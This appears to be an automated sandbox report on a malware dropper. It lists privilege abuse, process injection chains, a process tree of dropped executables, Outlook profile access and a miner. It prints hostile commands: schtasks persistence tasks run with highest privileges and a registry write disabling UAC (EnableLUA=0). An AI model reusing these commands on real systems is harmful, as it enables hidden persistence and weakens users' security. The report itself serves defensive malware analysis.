4363463463464363463463463.bin.exema.exe.exenative.exe7z.exe7z.exe7z.exe7z.exewinhostDhcp.exevbc.exeNSudo.execonhost.exeBBLb.exeBBLb.exepowershell.exeAttributeString.exeAttributeString.exeMSBuild.exe.exepowershell.exeMSBuild.exevbc.exepowershell.exepowershell.exeConhost.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4344 4363463463464363463463463.bin.exe Token: SeDebugPrivilege 1324 ma.exe Token: SeDebugPrivilege 2868 .exe Token: SeDebugPrivilege 3780 native.exe Token: SeRestorePrivilege 1304 7z.exe Token: 35 1304 7z.exe Token: SeSecurityPrivilege 1304 7z.exe Token: SeSecurityPrivilege 1304 7z.exe Token: SeRestorePrivilege 2584 7z.exe Token: 35 2584 7z.exe Token: SeSecurityPrivilege 2584 7z.exe Token: SeSecurityPrivilege 2584 7z.exe Token: SeRestorePrivilege 4316 7z.exe Token: 35 4316 7z.exe Token: SeSecurityPrivilege 4316 7z.exe Token: SeSecurityPrivilege 4316 7z.exe Token: SeRestorePrivilege 4080 7z.exe Token: 35 4080 7z.exe Token: SeSecurityPrivilege 4080 7z.exe Token: SeSecurityPrivilege 4080 7z.exe Token: SeDebugPrivilege 2020 winhostDhcp.exe Token: SeLockMemoryPrivilege 1644 vbc.exe Token: SeLockMemoryPrivilege 1644 vbc.exe Token: 18446744065119617044 2888 NSudo.exe Token: SeDebugPrivilege 1756 conhost.exe Token: SeDebugPrivilege 1844 BBLb.exe Token: SeDebugPrivilege 3304 BBLb.exe Token: SeDebugPrivilege 1144 powershell.exe Token: SeDebugPrivilege 1552 AttributeString.exe Token: SeDebugPrivilege 4956 AttributeString.exe Token: SeDebugPrivilege 3736 MSBuild.exe Token: SeDebugPrivilege 452 .exe Token: SeDebugPrivilege 756 powershell.exe Token: SeDebugPrivilege 2624 MSBuild.exe Token: SeLockMemoryPrivilege 2700 vbc.exe Token: SeLockMemoryPrivilege 2700 vbc.exe Token: SeDebugPrivilege 5000 powershell.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 2480 Conhost.exe Token: SeDebugPrivilege 2052 powershell.exe Token: SeIncreaseQuotaPrivilege 2052 powershell.exe Token: SeSecurityPrivilege 2052 powershell.exe Token: SeTakeOwnershipPrivilege 2052 powershell.exe Token: SeLoadDriverPrivilege 2052 powershell.exe Token: SeSystemProfilePrivilege 2052 powershell.exe Token: SeSystemtimePrivilege 2052 powershell.exe Token: SeProfSingleProcessPrivilege 2052 powershell.exe Token: SeIncBasePriorityPrivilege 2052 powershell.exe Token: SeCreatePagefilePrivilege 2052 powershell.exe Token: SeBackupPrivilege 2052 powershell.exe Token: SeRestorePrivilege 2052 powershell.exe Token: SeShutdownPrivilege 2052 powershell.exe Token: SeDebugPrivilege 2052 powershell.exe Token: SeSystemEnvironmentPrivilege 2052 powershell.exe Token: SeRemoteShutdownPrivilege 2052 powershell.exe Token: SeUndockPrivilege 2052 powershell.exe Token: SeManageVolumePrivilege 2052 powershell.exe Token: 33 2052 powershell.exe Token: 34 2052 powershell.exe Token: 35 2052 powershell.exe Token: 36 2052 powershell.exe Token: SeDebugPrivilege 3788 powershell.exe Token: SeIncreaseQuotaPrivilege 3788 powershell.exe Token: SeSecurityPrivilege 3788 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
vbc.exevbc.exe8Grb8KDhLIvSHwFX11Lr.exemsedge.exepid process 1644 vbc.exe 2700 vbc.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
8Grb8KDhLIvSHwFX11Lr.exemsedge.exepid process 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4363463463464363463463463.bin.exema.execmd.exe.execmd.exedvchost.execmd.exewinhostDhcp.execmd.exenative.exedescription pid process target process PID 4344 wrote to memory of 2876 4344 4363463463464363463463463.bin.exe rty47.exe PID 4344 wrote to memory of 2876 4344 4363463463464363463463463.bin.exe rty47.exe PID 4344 wrote to memory of 2096 4344 4363463463464363463463463.bin.exe bugai.exe PID 4344 wrote to memory of 2096 4344 4363463463464363463463463.bin.exe bugai.exe PID 4344 wrote to memory of 2096 4344 4363463463464363463463463.bin.exe bugai.exe PID 4344 wrote to memory of 1324 4344 4363463463464363463463463.bin.exe ma.exe PID 4344 wrote to memory of 1324 4344 4363463463464363463463463.bin.exe ma.exe PID 1324 wrote to memory of 3700 1324 ma.exe cmd.exe PID 1324 wrote to memory of 3700 1324 ma.exe cmd.exe PID 3700 wrote to memory of 852 3700 cmd.exe timeout.exe PID 3700 wrote to memory of 852 3700 cmd.exe timeout.exe PID 4344 wrote to memory of 3720 4344 4363463463464363463463463.bin.exe dvchost.exe PID 4344 wrote to memory of 3720 4344 4363463463464363463463463.bin.exe dvchost.exe PID 4344 wrote to memory of 3720 4344 4363463463464363463463463.bin.exe dvchost.exe PID 3700 wrote to memory of 2868 3700 cmd.exe .exe PID 3700 wrote to memory of 2868 3700 cmd.exe .exe PID 2868 wrote to memory of 4644 2868 .exe cmd.exe PID 2868 wrote to memory of 4644 2868 .exe cmd.exe PID 4644 wrote to memory of 3520 4644 cmd.exe schtasks.exe PID 4644 wrote to memory of 3520 4644 cmd.exe schtasks.exe PID 4344 wrote to memory of 3780 4344 4363463463464363463463463.bin.exe native.exe PID 4344 wrote to memory of 3780 4344 4363463463464363463463463.bin.exe native.exe PID 4344 wrote to memory of 3780 4344 4363463463464363463463463.bin.exe native.exe PID 3720 wrote to memory of 2104 3720 dvchost.exe cmd.exe PID 3720 wrote to memory of 2104 3720 dvchost.exe cmd.exe PID 2104 wrote to memory of 3200 2104 cmd.exe mode.com PID 2104 wrote to memory of 3200 2104 cmd.exe mode.com PID 2104 wrote to memory of 1304 2104 cmd.exe 7z.exe PID 2104 wrote to memory of 1304 2104 cmd.exe 7z.exe PID 2104 wrote to memory of 2584 2104 cmd.exe 7z.exe PID 2104 wrote to memory of 2584 2104 cmd.exe 7z.exe PID 2104 wrote to memory of 4316 2104 cmd.exe 7z.exe PID 2104 wrote to memory of 4316 2104 cmd.exe 7z.exe PID 2104 wrote to memory of 4080 2104 cmd.exe 7z.exe PID 2104 wrote to memory of 4080 2104 cmd.exe 7z.exe PID 2104 wrote to memory of 2008 2104 cmd.exe chcp.com PID 2104 wrote to memory of 2008 2104 cmd.exe chcp.com PID 2104 wrote to memory of 2020 2104 cmd.exe winhostDhcp.exe PID 2104 wrote to memory of 2020 2104 cmd.exe winhostDhcp.exe PID 2868 wrote to memory of 1644 2868 .exe vbc.exe PID 2868 wrote to memory of 1644 2868 .exe vbc.exe PID 2868 wrote to memory of 1644 2868 .exe vbc.exe PID 2868 wrote to memory of 1644 2868 .exe vbc.exe PID 2868 wrote to memory of 1644 2868 .exe vbc.exe PID 2868 wrote to memory of 1644 2868 .exe vbc.exe PID 2868 wrote to memory of 1644 2868 .exe vbc.exe PID 2020 wrote to memory of 5048 2020 winhostDhcp.exe cmd.exe PID 2020 wrote to memory of 5048 2020 winhostDhcp.exe cmd.exe PID 5048 wrote to memory of 2008 5048 cmd.exe chcp.com PID 5048 wrote to memory of 2008 5048 cmd.exe chcp.com PID 4344 wrote to memory of 3280 4344 4363463463464363463463463.bin.exe _wT.exe PID 4344 wrote to memory of 3280 4344 4363463463464363463463463.bin.exe _wT.exe PID 4344 wrote to memory of 2888 4344 4363463463464363463463463.bin.exe NSudo.exe PID 4344 wrote to memory of 2888 4344 4363463463464363463463463.bin.exe NSudo.exe PID 4344 wrote to memory of 4044 4344 4363463463464363463463463.bin.exe 32.exe PID 4344 wrote to memory of 4044 4344 4363463463464363463463463.bin.exe 32.exe PID 4344 wrote to memory of 4044 4344 4363463463464363463463463.bin.exe 32.exe PID 5048 wrote to memory of 756 5048 cmd.exe w32tm.exe PID 5048 wrote to memory of 756 5048 cmd.exe w32tm.exe PID 5048 wrote to memory of 1756 5048 cmd.exe conhost.exe PID 5048 wrote to memory of 1756 5048 cmd.exe conhost.exe PID 3780 wrote to memory of 1844 3780 native.exe BBLb.exe PID 3780 wrote to memory of 1844 3780 native.exe BBLb.exe PID 3780 wrote to memory of 1844 3780 native.exe BBLb.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
miner.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" miner.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
-
outlook_office_path 1 IoCs
Processes:
bugai.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bugai.exe -
outlook_win_path 1 IoCs
Processes:
bugai.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bugai.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.bin.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.bin.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Users\Admin\AppData\Local\Temp\Files\rty47.exe"C:\Users\Admin\AppData\Local\Temp\Files\rty47.exe"2⤵
- Executes dropped EXE
PID:2876 -
C:\Users\Admin\AppData\Local\Temp\Files\bugai.exe"C:\Users\Admin\AppData\Local\Temp\Files\bugai.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:2096 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:436 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4416 -
C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\8Grb8KDhLIvSHwFX11Lr.exe"C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\8Grb8KDhLIvSHwFX11Lr.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3856 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/4⤵PID:3956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵PID:2184
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,5597203421561906269,6992843833515507126,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:35⤵PID:6104
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,5597203421561906269,6992843833515507126,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:25⤵PID:6096
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login4⤵PID:4304
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3540 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,16576133022588054333,6748342368802147436,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 /prefetch:35⤵PID:6060
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,16576133022588054333,6748342368802147436,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:25⤵PID:6044
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video4⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1552 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4860 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:35⤵PID:5748
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:85⤵PID:5944
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:15⤵PID:5932
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:15⤵PID:5704
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:25⤵PID:5740
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/4⤵PID:4380
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2684 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1436,17294382015584421993,1794699919527336225,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 /prefetch:35⤵PID:6808
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video4⤵PID:3668
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵PID:1320
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com4⤵PID:4164
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4384 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,6535321715299811068,16110170856613559928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:35⤵PID:6968
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,6535321715299811068,16110170856613559928,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:25⤵PID:6680
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,6535321715299811068,16110170856613559928,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2476 /prefetch:25⤵PID:6704
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com4⤵PID:3968
-
